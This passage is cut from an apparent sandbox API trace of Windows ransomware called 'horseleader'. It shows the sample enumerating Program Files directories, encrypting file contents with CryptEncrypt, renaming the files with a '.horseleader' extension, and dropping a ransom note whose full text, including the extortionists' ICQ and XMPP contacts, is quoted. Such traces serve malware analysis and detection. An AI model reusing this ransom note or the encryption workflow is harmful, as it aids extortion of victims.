nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x201b78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.157] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.161] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.161] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.162] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.162] CloseHandle (hObject=0x158) returned 1 [0226.162] GetProcessHeap () returned 0x780000 [0226.162] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.162] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.horseleader") returned 82 [0226.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.horseleader")) returned 1 [0226.163] GetProcessHeap () returned 0x780000 [0226.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.163] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0226.163] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0226.164] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\#Decrypt#.txt") returned 72 [0226.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0226.164] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0226.164] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0226.168] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0226.168] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0226.168] CloseHandle (hObject=0x21c) returned 1 [0226.168] GetProcessHeap () returned 0x780000 [0226.169] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0226.169] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GRPHFLT", cAlternateFileName="")) returned 1 [0226.169] lstrcmpiW (lpString1="GRPHFLT", lpString2="Windows") returned -1 [0226.169] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned 58 [0226.169] lstrcmpW (lpString1="GRPHFLT", lpString2=".") returned 1 [0226.169] lstrcmpW (lpString1="GRPHFLT", lpString2="..") returned 1 [0226.169] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0226.169] GetProcessHeap () returned 0x780000 [0226.169] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0226.169] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*") returned 60 [0226.169] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0226.173] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0226.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\.") returned 60 [0226.173] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0226.173] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc25b4860, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0226.173] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0226.173] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\..") returned 61 [0226.174] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0226.174] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0226.174] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0226.174] lstrcmpiW (lpString1="CGMIMP32.CFG", lpString2="Windows") returned -1 [0226.174] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 71 [0226.174] StrStrIW (lpFirst="CGMIMP32.CFG", lpSrch=".horseleader") returned 0x0 [0226.174] lstrcmpW (lpString1="CGMIMP32.CFG", lpString2="#Decrypt#.txt") returned 1 [0226.174] lstrcmpW (lpString1="CGMIMP32.CFG", lpString2="_uninstalling_.png") returned 1 [0226.174] lstrlenW (lpString=".testttjffg") returned 11 [0226.174] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", lpSrch=".testttjffg") returned 0x0 [0226.174] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.174] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.174] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.175] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 71 [0226.175] StrStrW (lpFirst="CGMIMP32.CFG", lpSrch=".txt") returned 0x0 [0226.175] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6811) returned 1 [0226.175] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a9b, lpOverlapped=0x0) returned 1 [0226.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe565, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.540] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a9b, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a9b, lpOverlapped=0x0) returned 1 [0226.541] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.541] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.589] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.592] CloseHandle (hObject=0x158) returned 1 [0226.592] GetProcessHeap () returned 0x780000 [0226.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.592] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.horseleader") returned 83 [0226.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.horseleader")) returned 1 [0226.593] GetProcessHeap () returned 0x780000 [0226.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.627] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0226.627] lstrcmpiW (lpString1="CGMIMP32.FLT", lpString2="Windows") returned -1 [0226.627] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 71 [0226.627] StrStrIW (lpFirst="CGMIMP32.FLT", lpSrch=".horseleader") returned 0x0 [0226.627] lstrcmpW (lpString1="CGMIMP32.FLT", lpString2="#Decrypt#.txt") returned 1 [0226.627] lstrcmpW (lpString1="CGMIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0226.627] lstrlenW (lpString=".testttjffg") returned 11 [0226.627] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", lpSrch=".testttjffg") returned 0x0 [0226.627] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.627] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.653] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 71 [0226.653] StrStrW (lpFirst="CGMIMP32.FLT", lpSrch=".txt") returned 0x0 [0226.653] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=323936) returned 1 [0226.655] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.655] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.660] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.660] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.661] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x250b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.661] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.681] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.681] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.681] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4a160, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.682] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.708] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.708] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.708] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.708] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.708] CloseHandle (hObject=0x158) returned 1 [0226.709] GetProcessHeap () returned 0x780000 [0226.709] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.709] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.horseleader") returned 83 [0226.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.flt.horseleader")) returned 1 [0226.718] GetProcessHeap () returned 0x780000 [0226.722] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.722] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0226.724] lstrcmpiW (lpString1="CGMIMP32.FNT", lpString2="Windows") returned -1 [0226.724] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 71 [0226.724] StrStrIW (lpFirst="CGMIMP32.FNT", lpSrch=".horseleader") returned 0x0 [0226.724] lstrcmpW (lpString1="CGMIMP32.FNT", lpString2="#Decrypt#.txt") returned 1 [0226.724] lstrcmpW (lpString1="CGMIMP32.FNT", lpString2="_uninstalling_.png") returned 1 [0226.724] lstrlenW (lpString=".testttjffg") returned 11 [0226.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT", lpSrch=".testttjffg") returned 0x0 [0226.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.fnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.730] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 71 [0226.823] StrStrW (lpFirst="CGMIMP32.FNT", lpSrch=".txt") returned 0x0 [0226.840] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=606062) returned 1 [0226.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.840] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.861] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.862] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.862] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x477b7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.862] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, 